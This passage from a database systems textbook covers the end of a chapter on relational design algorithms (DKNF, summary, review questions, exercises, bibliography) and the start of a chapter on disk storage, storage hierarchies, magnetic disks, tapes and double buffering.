However, because of the difficulty of including complex constraints in a DKNF relation, its practical utility is limited, since it may be quite difficult to specify general integrity constraints. For example, consider a relation CAR(Make, Vin#) (where Vin# is the vehicle identification number) and another relation MANUFACTURE(Vin#, Country) (where Country is the country of manufacture). A general constraint may be of the following form: If the Make is either ‘Toyota’ or ‘Lexus,’ then the first character of the Vin# is a ‘J’ if the country of manufacture is ‘Japan’; if the Make is ‘Honda’ or ‘Acura,’ the second character of the Vin# is a ‘J’ if the country of manufacture is ‘Japan.’ There is no simplified way to represent such constraints short of writing a procedure (or general assertions) to test them. The procedure COMPUTE_TOTAL_PRICE above is an example of such procedures needed to enforce an appropriate integrity constraint.

7 Summary

In this chapter we presented a further set of topics related to dependencies, a discussion of decomposition, and several algorithms related to them as well as to normalization. In Section 1 we presented inference rules for functional dependencies (FDs), the notion of closure of an attribute, closure of a set of functional dependencies, equivalence among sets of functional dependencies, and algorithms for finding the closure of an attribute (Algorithm 1) and the minimal cover of a set of FDs (Algorithm 2). We then discussed two important properties of decompositions: the nonadditive join property and the dependency-preserving property. An algorithm to test for nonadditive decomposition (Algorithm 3), and a simpler test for checking the losslessness of binary decompositions (Property NJB) were described.

We then discussed relational design by synthesis, based on a set of given functional dependencies. The relational synthesis algorithms (such as Algorithms 4 and 6) create 3NF relations from a universal relation schema based on a given set of functional dependencies that has been specified by the database designer. The relational decomposition algorithms (such as Algorithms 5 and 7) create BCNF (or 4NF) relations by successive nonadditive decomposition of unnormalized relations into two component relations at a time. We saw that it is possible to synthesize 3NF relation schemas that meet both of the above properties; however, in the case of BCNF, it is possible to aim only for the nonadditiveness of joins—dependency preservation cannot be necessarily guaranteed. If the designer has to aim for one of these two, the nonadditive join condition is an absolute must.

In Section 4 we showed how certain difficulties arise in a collection of relations due to null values that may exist in relations in spite of the relations being individually in 3NF or BCNF. Sometimes when decomposition is improperly carried too far, certain “dangling tuples” may result that do not participate in results of joins and hence may become invisible. We also showed how it is possible to have alternative designs that meet a given desired normal form. Then we revisited multivalued dependencies (MVDs) in Section 5, which arise from an improper combination of two or more independent multivalued attributes in the same relation, and that result in a combinational expansion of the tuples used to define fourth normal form (4NF).

We discussed inference rules applicable to MVDs and discussed the importance of 4NF. Finally, in Section 6 we discussed inclusion dependencies, which are used to specify referential integrity and class/subclass constraints, and template dependencies, which can be used to specify arbitrary types of constraints. We pointed out the need for arithmetic functions or more complex procedures to enforce certain functional dependency constraints. We concluded with a brief discussion of the domain-key normal form (DKNF).

Review Questions

1. What is the role of Armstrong’s inference rules (inference rules IR1 through IR3) in the development of the theory of relational design?
2. What is meant by the completeness and soundness of Armstrong’s inference rules?
3. What is meant by the closure of a set of functional dependencies? Illustrate with an example.
4. When are two sets of functional dependencies equivalent? How can we determine their equivalence?
5. What is a minimal set of functional dependencies? Does every set of dependencies have a minimal equivalent set? Is it always unique?
6. What is meant by the attribute preservation condition on a decomposition?
7. Why are normal forms alone insufficient as a condition for a good schema design?
8. What is the dependency preservation property for a decomposition? Why is it important?
9. Why can we not guarantee that BCNF relation schemas will be produced by dependency-preserving decompositions of non-BCNF relation schemas? Give a counterexample to illustrate this point.
10. What is the lossless (or nonadditive) join property of a decomposition? Why is it important?
11. Between the properties of dependency preservation and losslessness, which one must definitely be satisfied? Why?
12. Discuss the NULL value and dangling tuple problems.
13. Illustrate how the process of creating first normal form relations may lead to multivalued dependencies. How should the first normalization be done properly so that MVDs are avoided?
14. What types of constraints are inclusion dependencies meant to represent?
15. How do template dependencies differ from the other types of dependencies we discussed?
16. Why is the domain-key normal form (DKNF) known as the ultimate normal form?

Exercises

17. Show that the relation schemas produced by Algorithm 4 are in 3NF.
18. Show that, if the matrix S resulting from Algorithm 3 does not have a row that is all a symbols, projecting S on the decomposition and joining it back will always produce at least one spurious tuple.
19. Show that the relation schemas produced by Algorithm 5 are in BCNF.
20. Show that the relation schemas produced by Algorithm 6 are in 3NF.
21. Specify a template dependency for join dependencies.
22. Specify all the inclusion dependencies for the relational schema in Figure A.2.
23. Prove that a functional dependency satisfies the formal definition of multivalued dependency.
24. Consider the example of normalizing the LOTS relation in Sections 4 and 5 from the chapter “Basics of Functional Dependencies and Normalization for Relational Databases.” Determine whether the decomposition of LOTS into {LOTS1AX, LOTS1AY, LOTS1B, LOTS2} has the lossless join property, by applying Algorithm 3 and also by using the test under Property NJB.
25. Show how the MVDs Ename →→ Pname and Ename →→ Dname in Figure 15(a) from the chapter “Basics of Functional Dependencies and Normalization for Relational Databases” may arise during normalization into 1NF of a relation, where the attributes Pname and Dname are multivalued.
26. Apply Algorithm 2(a) to the relation in Exercise 24 from the chapter “Basics of Functional Dependencies and Normalization for Relational Databases” to determine a key for R. Create a minimal set of dependencies G that is equivalent to F, and apply the synthesis algorithm (Algorithm 6) to decompose R into 3NF relations.
27. Repeat Exercise 26 for the functional dependencies in Exercise 25 from the chapter “Basics of Functional Dependencies and Normalization for Relational Databases.”
28. Apply the decomposition algorithm (Algorithm 5) to the relation R and the set of dependencies F in Exercise 24 from the chapter “Basics of Functional Dependencies and Normalization for Relational Databases.” Repeat for the dependencies G in Exercise 25 from the same chapter.
29. Apply Algorithm 2(a) to the relations in Exercises 27 and 28 from the chapter “Basics of Functional Dependencies and Normalization for Relational Databases” to determine a key for R. Apply the synthesis algorithm (Algorithm 6) to decompose R into 3NF relations and the decomposition algorithm (Algorithm 5) to decompose R into BCNF relations.
30. Write programs that implement Algorithms 5 and 6.
31. Consider the following decompositions for the relation schema R of Exercise 24 from the chapter “Basics of Functional Dependencies and Normalization for Relational Databases.” Determine whether each decomposition has (1) the dependency preservation property, and (2) the lossless join property, with respect to F. Also determine which normal form each relation in the decomposition is in.
a. D1 = {R1, R2, R3, R4, R5}; R1 = {A, B, C}, R2 = {A, D, E}, R3 = {B, F}, R4 = {F, G, H}, R5 = {D, I, J}
b. D2 = {R1, R2, R3}; R1 = {A, B, C, D, E}, R2 = {B, F, G, H}, R3 = {D, I, J}
c. D3 = {R1, R2, R3, R4, R5}; R1 = {A, B, C, D}, R2 = {D, E}, R3 = {B, F}, R4 = {F, G, H}, R5 = {D, I, J}
32. Consider the relation REFRIG(Model#, Year, Price, Manuf_plant, Color), which is abbreviated as REFRIG(M, Y, P, MP, C), and the following set F of functional dependencies: F = {M → MP, {M, Y} → P, MP → C}
a. Evaluate each of the following as a candidate key for REFRIG, giving reasons why it can or cannot be a key: {M}, {M, Y}, {M, C}.
b. Based on the above key determination, state whether the relation REFRIG is in 3NF and in BCNF, giving proper reasons.
c. Consider the decomposition of REFRIG into D = {R1(M, Y, P), R2(M, MP, C)}. Is this decomposition lossless? Show why. (You may consult the test under Property NJB in Section 2.4.)

Laboratory Exercises

Note: These exercises use the DBD (Data Base Designer) system that is described in the laboratory manual. The relational schema R and set of functional dependencies F need to be coded as lists. As an example, R and F for Problem 24 from the chapter “Basics of Functional Dependencies and Normalization for Relational Databases” are coded as:

R = [a, b, c, d, e, f, g, h, i, j]
F = [[[a, b],[c]], [[a],[d, e]], [[b],[f]], [[f],[g, h]], [[d],[i, j]]]

Since DBD is implemented in Prolog, use of uppercase terms is reserved for variables in the language and therefore lowercase constants are used to code the attributes.
For further details on using the DBD system, please refer to the laboratory manual. 33. Using the DBD system, verify your answers to the following exercises: a. 24 b. 26 c. 27 d. 28 e. 29 f. 31 (a) and (b) g. 32 (a) and (c) 585 Relational Database Design Algorithms and Further Dependencies Selected Bibliography The books by Maier (1983) and Atzeni and De Antonellis (1993) include a compre- hensive discussion of relational dependency theory. The decomposition algorithm (Algorithm 5) is due to Bernstein (1976). Algorithm 6 is based on the normalization algorithm presented in Biskup et al. (1979). Tsou and Fischer (1982) give a polyno- mial-time algorithm for BCNF decomposition. The theory of dependency preservation and lossless joins is given in Ullman (1988), where proofs of some of the algorithms discussed here appear. The lossless join property is analyzed in Aho et al. (1979). Algorithms to determine the keys of a rela- tion from functional dependencies are given in Osborn (1977); testing for BCNF is discussed in Osborn (1979). Testing for 3NF is discussed in Tsou and Fischer (1982). Algorithms for designing BCNF relations are given in Wang (1990) and Hernandez and Chan (1991). Multivalued dependencies and fourth normal form are defined in Zaniolo (1976) and Nicolas (1978). Many of the advanced normal forms are due to Fagin: the fourth normal form in Fagin (1977), PJNF in Fagin (1979), and DKNF in Fagin (1981). The set of sound and complete rules for functional and multivalued dependencies was given by Beeri et al. (1977). Join dependencies are discussed by Rissanen (1977) and Aho et al. (1979). Inference rules for join dependencies are given by Sciore (1982). Inclusion dependencies are discussed by Casanova et al. (1981) and analyzed further in Cosmadakis et al. (1990). Their use in optimizing relational schemas is discussed in Casanova et al. (1989). Template dependencies are discussed by Sadri and Ullman (1982). Other dependencies are discussed in Nicolas (1978), Furtado (1978), and Mendelzon and Maier (1979). Abiteboul et al. (1995) provides a theoretical treatment of many of the ideas presented in this chapter. 586 EMPLOYEE Salary Employee_type Position Rank Percent_time Ra_flag Ta_flag Project Course STUDENT Major_dept Grad_flag Undergrad_flag Degree_program Class Student_assist_flag Name Birth_date Sex Address PERSON Ssn ALUMNUS ALUMNUS_DEGREES Year MajorSsn Ssn Ssn Ssn Degree Figure A.1 Mapping an EER specialization lattice using multiple options. DEPARTMENT Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno EMPLOYEE DEPT_LOCATIONS Dnumber Dlocation PROJECT Pname Pnumber Plocation Dnum WORKS_ON Essn Pno Hours DEPENDENT Essn Dependent_name Sex Bdate Relationship Dname Dnumber Mgr_ssn Mgr_start_date Figure A.2 Schema diagram for the COMPANY relational database schema. 587 Disk Storage, Basic File Structures, and Hashing Databases are stored physically as files of records,which are typically stored on magnetic disks. This chapter deals with the organization of databases in storage and the techniques for accessing them efficiently using various algorithms, some of which require auxiliary data structures called indexes. These structures are often referred to as physical database file structures, and are at the physical level of three-schema architecture. We start in Section 1 by introducing the concepts of computer storage hierarchies and how they are used in database systems. 
Section 2 is devoted to a description of magnetic disk storage devices and their characteristics, and we also briefly describe magnetic tape storage devices. After discussing different storage technologies, we turn our attention to the methods for physically organizing data on disks. Section 3 covers the technique of double buffering, which is used to speed retrieval of multi- ple disk blocks. In Section 4 we discuss various ways of formatting and storing file records on disk. Section 5 discusses the various types of operations that are typically applied to file records. We present three primary methods for organizing file records on disk: unordered records, in Section 6; ordered records, in Section 7; and hashed records, in Section 8. Section 9 briefly introduces files of mixed records and other primary methods for organizing records, such as B-trees. These are particularly relevant for storage of object-oriented databases. Section 10 describes RAID (Redundant Arrays of Inexpensive (or Independent) Disks)—a data storage system architecture that is commonly used in large organizations for better reliability and performance. Finally, in Section 11 we describe three developments in the storage systems area: storage area networks (SAN), network-attached storage (NAS), and iSCSI (Internet From Chapter 17 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison- Wesley. All rights reserved. 588 Disk Storage, Basic File Structures, and Hashing SCSI—Small Computer System Interface), the latest technology, which makes stor- age area networks more affordable without the use of the Fiber Channel infrastruc- ture and hence is getting very wide acceptance in industry. Section 12 summarizes the chapter. This chapter may be browsed through or even omitted by readers who have already studied file organizations and indexing in a separate course. The material covered here, in particular Sections 1 through 8, is necessary for understanding query pro- cessing and optimization, and database tuning for improving performance of queries. 1 Introduction The collection of data that makes up a computerized database must be stored phys- ically on some computer storage medium. The DBMS software can then retrieve, update, and process this data as needed. Computer storage media form a storage hierarchy that includes two main categories: ■ Primary storage. This category includes storage media that can be operated on directly by the computer’s central processing unit (CPU), such as the com- puter’s main memory and smaller but faster cache memories. Primary stor- age usually provides fast access to data but is of limited storage capacity. Although main memory capacities have been growing rapidly in recent years, they are still more expensive and have less storage capacity than sec- ondary and tertiary storage devices. ■ Secondary and tertiary storage. This category includes magnetic disks, optical disks (CD-ROMs, DVDs, and other similar storage media), and tapes. Hard-disk drives are classified as secondary storage, whereas remov- able media such as optical disks and tapes are considered tertiary storage. These devices usually have a larger capacity, cost less, and provide slower access to data than do primary storage devices. Data in secondary or tertiary storage cannot be processed directly by the CPU; first it must be copied into primary storage and then processed by the CPU. 
We first give an overview of the various storage devices used for primary and sec- ondary storage in Section 1.1 and then discuss how databases are typically handled in the storage hierarchy in Section 1.2. 1.1 Memory Hierarchies and Storage Devices In a modern computer system, data resides and is transported throughout a hierar- chy of storage media. The highest-speed memory is the most expensive and is there- fore available with the least capacity. The lowest-speed memory is offline tape storage, which is essentially available in indefinite storage capacity. 589 Disk Storage, Basic File Structures, and Hashing At the primary storage level, the memory hierarchy includes at the most expensive end, cache memory, which is a static RAM (Random Access Memory). Cache mem- ory is typically used by the CPU to speed up execution of program instructions using techniques such as prefetching and pipelining. The next level of primary stor- age is DRAM (Dynamic RAM), which provides the main work area for the CPU for keeping program instructions and data. It is popularly called main memory. The advantage of DRAM is its low cost, which continues to decrease; the drawback is its volatility1 and lower speed compared with static RAM. At the secondary and tertiary storage level, the hierarchy includes magnetic disks, as well as mass storage in the form of CD-ROM (Compact Disk–Read-Only Memory) and DVD (Digital Video Disk or Digital Versatile Disk) devices, and finally tapes at the least expensive end of the hierarchy. The storage capacity is measured in kilobytes (Kbyte or 1000 bytes), megabytes (MB or 1 million bytes), gigabytes (GB or 1 billion bytes), and even ter- abytes (1000 GB). The word petabyte (1000 terabytes or 10**15 bytes) is now becoming relevant in the context of very large repositories of data in physics, astronomy, earth sciences, and other scientific applications. Programs reside and execute in DRAM. Generally, large permanent databases reside on secondary storage, (magnetic disks), and portions of the database are read into and written from buffers in main memory as needed. Nowadays, personal comput- ers and workstations have large main memories of hundreds of megabytes of RAM and DRAM, so it is becoming possible to load a large part of the database into main memory. Eight to 16 GB of main memory on a single server is becoming common- place. In some cases, entire databases can be kept in main memory (with a backup copy on magnetic disk), leading to main memory databases; these are particularly useful in real-time applications that require extremely fast response times. An example is telephone switching applications, which store databases that contain routing and line information in main memory. Between DRAM and magnetic disk storage, another form of memory, flash mem- ory, is becoming common, particularly because it is nonvolatile. Flash memories are high-density, high-performance memories using EEPROM (Electrically Erasable Programmable Read-Only Memory) technology. The advantage of flash memory is the fast access speed; the disadvantage is that an entire block must be erased and written over simultaneously. Flash memory cards are appearing as the data storage medium in appliances with capacities ranging from a few megabytes to a few giga- bytes. These are appearing in cameras, MP3 players, cell phones, PDAs, and so on. 
USB (Universal Serial Bus) flash drives have become the most portable medium for carrying data between personal computers; they have a flash memory storage device integrated with a USB interface. CD-ROM (Compact Disk – Read Only Memory) disks store data optically and are read by a laser. CD-ROMs contain prerecorded data that cannot be overwritten. WORM (Write-Once-Read-Many) disks are a form of optical storage used for 1Volatile memory typically loses its contents in case of a power outage, whereas nonvolatile memory does not. 590 Disk Storage, Basic File Structures, and Hashing archiving data; they allow data to be written once and read any number of times without the possibility of erasing. They hold about half a gigabyte of data per disk and last much longer than magnetic disks.2 Optical jukebox memories use an array of CD-ROM platters, which are loaded onto drives on demand. Although optical jukeboxes have capacities in the hundreds of gigabytes, their retrieval times are in the hundreds of milliseconds, quite a bit slower than magnetic disks. This type of storage is continuing to decline because of the rapid decrease in cost and increase in capacities of magnetic disks. The DVD is another standard for optical disks allowing 4.5 to 15 GB of storage per disk. Most personal computer disk drives now read CD- ROM and DVD disks. Typically, drives are CD-R (Compact Disk Recordable) that can create CD-ROMs and audio CDs (Compact Disks), as well as record on DVDs. Finally, magnetic tapes are used for archiving and backup storage of data. Tape jukeboxes—which contain a bank of tapes that are catalogued and can be automat- ically loaded onto tape drives—are becoming popular as tertiary storage to hold terabytes of data. For example, NASA’s EOS (Earth Observation Satellite) system stores archived databases in this fashion. Many large organizations are already finding it normal to have terabyte-sized data- bases. The term very large database can no longer be precisely defined because disk storage capacities are on the rise and costs are declining. Very soon the term may be reserved for databases containing tens of terabytes. 1.2 Storage of Databases Databases typically store large amounts of data that must persist over long periods of time, and hence is often referred to as persistent data. Parts of this data are accessed and processed repeatedly during this period. This contrasts with the notion of transient data that persist for only a limited time during program execution. Most databases are stored permanently (or persistently) on magnetic disk secondary storage, for the following reasons: ■ Generally, databases are too large to fit entirely in main memory. ■ The circumstances that cause permanent loss of stored data arise less fre- quently for disk secondary storage than for primary storage. Hence, we refer to disk—and other secondary storage devices—as nonvolatile storage, whereas main memory is often called volatile storage. ■ The cost of storage per unit of data is an order of magnitude less for disk sec- ondary storage than for primary storage. Some of the newer technologies—such as optical disks, DVDs, and tape juke- boxes—are likely to provide viable alternatives to the use of magnetic disks. In the future, databases may therefore reside at different levels of the memory hierarchy from those described in Section 1.1. 
However, it is anticipated that magnetic disks 2Their rotational speeds are lower (around 400 rpm), giving higher latency delays and low transfer rates (around 100 to 200 KB/second). 591 Disk Storage, Basic File Structures, and Hashing will continue to be the primary medium of choice for large databases for years to come. Hence, it is important to study and understand the properties and character- istics of magnetic disks and the way data files can be organized on disk in order to design effective databases with acceptable performance. Magnetic tapes are frequently used as a storage medium for backing up databases because storage on tape costs even less than storage on disk. However, access to data on tape is quite slow. Data stored on tapes is offline; that is, some intervention by an operator—or an automatic loading device—to load a tape is needed before the data becomes available. In contrast, disks are online devices that can be accessed directly at any time. The techniques used to store large amounts of structured data on disk are impor- tant for database designers, the DBA, and implementers of a DBMS. Database designers and the DBA must know the advantages and disadvantages of each stor- age technique when they design, implement, and operate a database on a specific DBMS. Usually, the DBMS has several options available for organizing the data. The process of physical database design involves choosing the particular data organiza- tion techniques that best suit the given application requirements from among the options. DBMS system implementers must study data organization techniques so that they can implement them efficiently and thus provide the DBA and users of the DBMS with sufficient options. Typical database applications need only a small portion of the database at a time for processing. Whenever a certain portion of the data is needed, it must be located on disk, copied to main memory for processing, and then rewritten to the disk if the data is changed. The data stored on disk is organized as files of records. Each record is a collection of data values that can be interpreted as facts about entities, their attributes, and their relationships. Records should be stored on disk in a manner that makes it possible to locate them efficiently when they are needed. There are several primary file organizations, which determine how the file records are physically placed on the disk, and hence how the records can be accessed. A heap file (or unordered file) places the records on disk in no particular order by appending new records at the end of the file, whereas a sorted file (or sequential file) keeps the records ordered by the value of a particular field (called the sort key). A hashed file uses a hash function applied to a particular field (called the hash key) to determine a record’s placement on disk. Other primary file organizations, such as B-trees, use tree structures. We discuss primary file organizations in Sections 6 through 9. A secondary organization or auxiliary access structure allows efficient access to file records based on alternate fields than those that have been used for the primary file organization. Most of these exist as indexes. 2 Secondary Storage Devices In this section we describe some characteristics of magnetic disk and magnetic tape storage devices. Readers who have already studied these devices may simply browse through this section. 
592 Disk Storage, Basic File Structures, and Hashing Actuator movement Track ArmActuator Read/write head Spindle Disk rotation Cylinder of tracks (imaginary) (a) (b) Figure 1 (a) A single-sided disk with read/write hardware. (b) A disk pack with read/write hardware. 2.1 Hardware Description of Disk Devices Magnetic disks are used for storing large amounts of data. The most basic unit of data on the disk is a single bit of information. By magnetizing an area on disk in cer- tain ways, one can make it represent a bit value of either 0 (zero) or 1 (one). To code information, bits are grouped into bytes (or characters). Byte sizes are typically 4 to 8 bits, depending on the computer and the device. We assume that one character is stored in a single byte, and we use the terms byte and character interchangeably. The capacity of a disk is the number of bytes it can store, which is usually very large. Small floppy disks used with microcomputers typically hold from 400 KB to 1.5 MB; they are rapidly going out of circulation. Hard disks for personal computers typically hold from several hundred MB up to tens of GB; and large disk packs used with servers and mainframes have capacities of hundreds of GB. Disk capacities continue to grow as technology improves. Whatever their capacity, all disks are made of magnetic material shaped as a thin circular disk, as shown in Figure 1(a), and protected by a plastic or acrylic cover. A 593 Disk Storage, Basic File Structures, and Hashing Track(a) Sector (arc of track) (b) Three sectors Two sectors One sector Figure 2 Different sector organ- izations on disk. (a) Sectors subtending a fixed angle. (b) Sectors maintaining a uniform recording density. disk is single-sided if it stores information on one of its surfaces only and double- sided if both surfaces are used. To increase storage capacity, disks are assembled into a disk pack, as shown in Figure 1(b), which may include many disks and therefore many surfaces. Information is stored on a disk surface in concentric circles of small width,3 each having a distinct diameter. Each circle is called a track. In disk packs, tracks with the same diameter on the various surfaces are called a cylinder because of the shape they would form if connected in space. The concept of a cylinder is important because data stored on one cylinder can be retrieved much faster than if it were distributed among different cylinders. The number of tracks on a disk ranges from a few hundred to a few thousand, and the capacity of each track typically ranges from tens of Kbytes to 150 Kbytes. Because a track usually contains a large amount of information, it is divided into smaller blocks or sectors. The division of a track into sectors is hard-coded on the disk surface and cannot be changed. One type of sector organization, as shown in Figure 2(a), calls a portion of a track that subtends a fixed angle at the center a sec- tor. Several other sector organizations are possible, one of which is to have the sec- tors subtend smaller angles at the center as one moves away, thus maintaining a uniform density of recording, as shown in Figure 2(b). A technique called ZBR (Zone Bit Recording) allows a range of cylinders to have the same number of sectors per arc. For example, cylinders 0–99 may have one sector per track, 100–199 may have two per track, and so on. Not all disks have their tracks divided into sectors. 
The division of a track into equal-sized disk blocks (or pages) is set by the operat- ing system during disk formatting (or initialization). Block size is fixed during ini- tialization and cannot be changed dynamically. Typical disk block sizes range from 512 to 8192 bytes. A disk with hard-coded sectors often has the sectors subdivided into blocks during initialization. Blocks are separated by fixed-size interblock gaps, which include specially coded control information written during disk initializa- tion. This information is used to determine which block on the track follows each 3In some disks, the circles are now connected into a kind of continuous spiral. 594 Disk Storage, Basic File Structures, and Hashing Table 1 Specifications of Typical High-End Cheetah Disks from Seagate Description Cheetah 15K.6 Cheetah NS 10K Model Number ST3450856SS/FC ST3400755FC Height 25.4 mm 26.11 mm Width 101.6 mm 101.85 mm Length 146.05 mm 147 mm Weight 0.709 kg 0.771 kg Capacity Formatted Capacity 450 Gbytes 400 Gbytes Configuration Number of disks (physical) 4 4 Number of heads (physical) 8 8 Performance Transfer Rates Internal Transfer Rate (min) 1051 Mb/sec Internal Transfer Rate (max) 2225 Mb/sec 1211 Mb/sec Mean Time Between Failure (MTBF) 1.4 M hours Seek Times Avg. Seek Time (Read) 3.4 ms (typical) 3.9 ms (typical) Avg. Seek Time (Write) 3.9 ms (typical) 4.2 ms (typical) Track-to-track, Seek, Read 0.2 ms (typical) 0.35 ms (typical) Track-to-track, Seek, Write 0.4 ms (typical) 0.35 ms (typical) Average Latency 2 ms 2.98 msec Courtesy Seagate Technology interblock gap. Table 1 illustrates the specifications of typical disks used on large servers in industry. The 10K and 15K prefixes on disk names refer to the rotational speeds in rpm (revolutions per minute). There is continuous improvement in the storage capacity and transfer rates associ- ated with disks; they are also progressively getting cheaper—currently costing only a fraction of a dollar per megabyte of disk storage. Costs are going down so rapidly that costs as low 0.025 cent/MB—which translates to $0.25/GB and $250/TB—are already here. A disk is a random access addressable device. Transfer of data between main memory and disk takes place in units of disk blocks. The hardware address of a block—a combination of a cylinder number, track number (surface number within the cylin- der on which the track is located), and block number (within the track) is supplied to the disk I/O (input/output) hardware. In many modern disk drives, a single num- ber called LBA (Logical Block Address), which is a number between 0 and n (assum- ing the total capacity of the disk is n + 1 blocks), is mapped automatically to the right block by the disk drive controller. The address of a buffer—a contiguous 595 reserved area in main storage that holds one disk block—is also provided. For a read command, the disk block is copied into the buffer; whereas for a write com- mand, the contents of the buffer are copied into the disk block. Sometimes several contiguous blocks, called a cluster, may be transferred as a unit. In this case, the buffer size is adjusted to match the number of bytes in the cluster. The actual hardware mechanism that reads or writes a block is the disk read/write head, which is part of a system called a disk drive. A disk or disk pack is mounted in the disk drive, which includes a motor that rotates the disks. A read/write head includes an electronic component attached to a mechanical arm. 
Disk packs with multiple surfaces are controlled by several read/write heads—one for each surface, as shown in Figure 1(b). All arms are connected to an actuator attached to another electrical motor, which moves the read/write heads in unison and positions them precisely over the cylinder of tracks specified in a block address. Disk drives for hard disks rotate the disk pack continuously at a constant speed (typically ranging between 5,400 and 15,000 rpm). Once the read/write head is positioned on the right track and the block specified in the block address moves under the read/write head, the electronic component of the read/write head is acti- vated to transfer the data. Some disk units have fixed read/write heads, with as many heads as there are tracks. These are called fixed-head disks, whereas disk units with an actuator are called movable-head disks. For fixed-head disks, a track or cylinder is selected by electronically switching to the appropriate read/write head rather than by actual mechanical movement; consequently, it is much faster. However, the cost of the additional read/write heads is quite high, so fixed-head disks are not com- monly used. A disk controller, typically embedded in the disk drive, controls the disk drive and interfaces it to the computer system. One of the standard interfaces used today for disk drives on PCs and workstations is called SCSI (Small Computer System Interface). The controller accepts high-level I/O commands and takes appropriate action to position the arm and causes the read/write action to take place. To transfer a disk block, given its address, the disk controller must first mechanically position the read/write head on the correct track. The time required to do this is called the seek time. Typical seek times are 5 to 10 msec on desktops and 3 to 8 msecs on servers. Following that, there is another delay—called the rotational delay or latency—while the beginning of the desired block rotates into position under the read/write head. It depends on the rpm of the disk. For example, at 15,000 rpm, the time per rotation is 4 msec and the average rotational delay is the time per half rev- olution, or 2 msec. At 10,000 rpm the average rotational delay increases to 3 msec. Finally, some additional time is needed to transfer the data; this is called the block transfer time. Hence, the total time needed to locate and transfer an arbitrary block, given its address, is the sum of the seek time, rotational delay, and block transfer time. The seek time and rotational delay are usually much larger than the block transfer time. To make the transfer of multiple blocks more efficient, it is common to transfer several consecutive blocks on the same track or cylinder. This eliminates the seek time and rotational delay for all but the first block and can result Disk Storage, Basic File Structures, and Hashing 596 Disk Storage, Basic File Structures, and Hashing in a substantial saving of time when numerous contiguous blocks are transferred. Usually, the disk manufacturer provides a bulk transfer rate for calculating the time required to transfer consecutive blocks. The time needed to locate and transfer a disk block is in the order of milliseconds, usually ranging from 9 to 60 msec. For contiguous blocks, locating the first block takes from 9 to 60 msec, but transferring subsequent blocks may take only 0.4 to 2 msec each. Many search techniques take advantage of consecutive retrieval of blocks when searching for data on disk. 
In any case, a transfer time in the order of millisec- onds is considered quite high compared with the time required to process data in main memory by current CPUs. Hence, locating data on disk is a major bottleneck in database applications. The file structures we discuss here attempt to minimize the number of block transfers needed to locate and transfer the required data from disk to main memory. Placing “related information” on contiguous blocks is the basic goal of any storage organization on disk. 2.2 Magnetic Tape Storage Devices Disks are random access secondary storage devices because an arbitrary disk block may be accessed at random once we specify its address. Magnetic tapes are sequen- tial access devices; to access the nth block on tape, first we must scan the preceding n – 1 blocks. Data is stored on reels of high-capacity magnetic tape, somewhat sim- ilar to audiotapes or videotapes. A tape drive is required to read the data from or write the data to a tape reel. Usually, each group of bits that forms a byte is stored across the tape, and the bytes themselves are stored consecutively on the tape. A read/write head is used to read or write data on tape. Data records on tape are also stored in blocks—although the blocks may be substantially larger than those for disks, and interblock gaps are also quite large. With typical tape densities of 1600 to 6250 bytes per inch, a typical interblock gap4 of 0.6 inch corresponds to 960 to 3750 bytes of wasted storage space. It is customary to group many records together in one block for better space utilization. The main characteristic of a tape is its requirement that we access the data blocks in sequential order. To get to a block in the middle of a reel of tape, the tape is mounted and then scanned until the required block gets under the read/write head. For this reason, tape access can be slow and tapes are not used to store online data, except for some specialized applications. However, tapes serve a very important function—backing up the database. One reason for backup is to keep copies of disk files in case the data is lost due to a disk crash, which can happen if the disk read/write head touches the disk surface because of mechanical malfunction. For this reason, disk files are copied periodically to tape. For many online critical appli- cations, such as airline reservation systems, to avoid any downtime, mirrored sys- tems are used to keep three sets of identical disks—two in online operation and one 4Called interrecord gaps in tape terminology. 597 Disk Storage, Basic File Structures, and Hashing as backup. Here, offline disks become a backup device. The three are rotated so that they can be switched in case there is a failure on one of the live disk drives. Tapes can also be used to store excessively large database files. Database files that are seldom used or are outdated but required for historical record keeping can be archived on tape. Originally, half-inch reel tape drives were used for data storage employing the so-called 9 track tapes. Later, smaller 8-mm magnetic tapes (similar to those used in camcorders) that can store up to 50 GB, as well as 4-mm helical scan data cartridges and writable CDs and DVDs, became popular media for backing up data files from PCs and workstations. They are also used for storing images and system libraries. Backing up enterprise databases so that no transaction information is lost is a major undertaking. 
Currently, tape libraries with slots for several hundred cartridges are used with Digital and Superdigital Linear Tapes (DLTs and SDLTs) having capacities in hundreds of gigabytes that record data on linear tracks. Robotic arms are used to write on multiple cartridges in parallel using multiple tape drives with automatic labeling software to identify the backup cartridges. An example of a giant library is the SL8500 model of Sun Storage Technology that can store up to 70 petabytes (petabyte = 1000 TB) of data using up to 448 drives with a maximum throughput rate of 193.2 TB/hour. We defer the discussion of disk storage technology called RAID, and of storage area networks, network-attached storage, and iSCSI storage systems to the end of the chapter. 3 Buffering of Blocks When several blocks need to be transferred from disk to main memory and all the block addresses are known, several buffers can be reserved in main memory to speed up the transfer. While one buffer is being read or written, the CPU can process data in the other buffer because an independent disk I/O processor (con- troller) exists that, once started, can proceed to transfer a data block between mem- ory and disk independent of and in parallel to CPU processing. Figure 3 illustrates how two processes can proceed in parallel. Processes A and B are running concurrently in an interleaved fashion, whereas processes C and D are running concurrently in a parallel fashion. When a single CPU controls multiple processes, parallel execution is not possible. However, the processes can still run concurrently in an interleaved way. Buffering is most useful when processes can run concurrently in a parallel fashion, either because a separate disk I/O processor is available or because multiple CPU processors exist. Figure 4 illustrates how reading and processing can proceed in parallel when the time required to process a disk block in memory is less than the time required to read the next block and fill a buffer. The CPU can start processing a block once its transfer to main memory is completed; at the same time, the disk I/O processor can be reading and transferring the next block into a different buffer. This technique is called double buffering and can also be used to read a continuous stream of blocks from disk to memory. Double buffering permits continuous reading or writing of data on consecutive disk blocks, which eliminates the seek time and rotational delay 598 Disk Storage, Basic File Structures, and Hashing Interleaved concurrency of operations A and B Parallel execution of operations C and D t1 A A B B t2 t3 t4 Time Figure 3 Interleaved concurrency versus parallel execution. i + 1 Process B i + 2 Fill A Time i Process A i + 1 Fill B Disk Block: I/O: Disk Block: PROCESSING: i Fill A i + 2 Process A i + 3 Fill A i + 4 Process A i + 3 Process B i + 4 Fill A Figure 4 Use of two buffers, A and B, for reading from disk. for all but the first block transfer. Moreover, data is kept ready for processing, thus reducing the waiting time in the programs. 4 Placing File Records on Disk In this section, we define the concepts of records, record types, and files. Then we discuss techniques for placing file records on disk. 4.1 Records and Record Types Data is usually stored in the form of records. Each record consists of a collection of related data values or items, where each 